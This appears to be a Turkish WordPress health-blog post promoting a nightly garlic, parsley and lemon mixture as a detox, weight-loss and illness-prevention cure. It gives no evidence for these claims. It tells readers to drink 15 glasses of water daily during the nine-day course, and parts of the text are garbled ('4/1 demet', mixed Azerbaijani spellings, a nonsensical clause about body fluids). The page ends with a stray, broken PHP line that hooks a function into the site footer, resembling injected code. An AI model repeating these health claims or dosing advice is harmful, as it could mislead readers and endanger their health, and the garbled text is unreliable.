Sarımsakla Maydanozu Karıştırıp Yerseniz …

Sarımsak ve maydanoz ayrı ayrı organizma için gerçek bir şifa kaynağı olan besinlerdir. Vücudu toksinlerden arındıran, kilo vermeye ve sağlıklı kalmaya yardımcı olan bu iki gıdayı karıştırarak yeyende ise sonuç daha çabuk elde edilir.

Bu Kürle soğuk aylarda herkesi rahatsız eden hastalıklardan korunacak, ideal kiloda kalacak, kendinizi çok enerjik hissedeceksiniz.

Önceden belirtelim ki, bu reçeteyi her gece yatmadan 5-10 dakika önce hazırlayıp kullanmak gerekir.

Malzemeler:
1 diş sarımsak
Yarım limonun suyu
4/1 demet maydanoz

Hazırlanışı:
Maydanoz ile sarımsağı çok ince doğrayın veya mutfak robotundan geçirin. Maydanoz sarımsak karışımının üzerine limon şiresini ekleyin. İyice karıştırın. Bu karışımı tablet gibi, kaşıkla ağzınıza koyup su ile karıştırın.

Belirtelim ki, bu kür idrar söktürücü olduğu için tüm sıvıyı vücuttan hizmetinizdedir. Odur ki, Kürdən kullandığınız sürece her gün 15 bardak su içmelisiniz.

Kürdan 9 gün kullandıktan sonra 2 hafta ara verin. Daha sonra daha 9 gün küre devam edebilirsiniz. Kür tansiyonu olanlar ve hamileler için tavsiye edilmez.

Yaklaşık admin

Ben Harun Güçlü 1988 Trabzon akçaabat doğumluyum küçük yaşlarımdan beri araştırmacı ve bilgi paylaşımcı bir insandım, tek hedefim habercilikte doruğa ulaşmak

Ayrıca kontrol

Kanser Hastalarına Büyük Bağış Yaptı !

Kanser hastalarına yardım amaçlı 29 adet yağlı boya ile yapılmış olan tabloyu Necla Yılmaz , ...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

function burakk(){ echo ' } add_action("wp_footer",'burakk');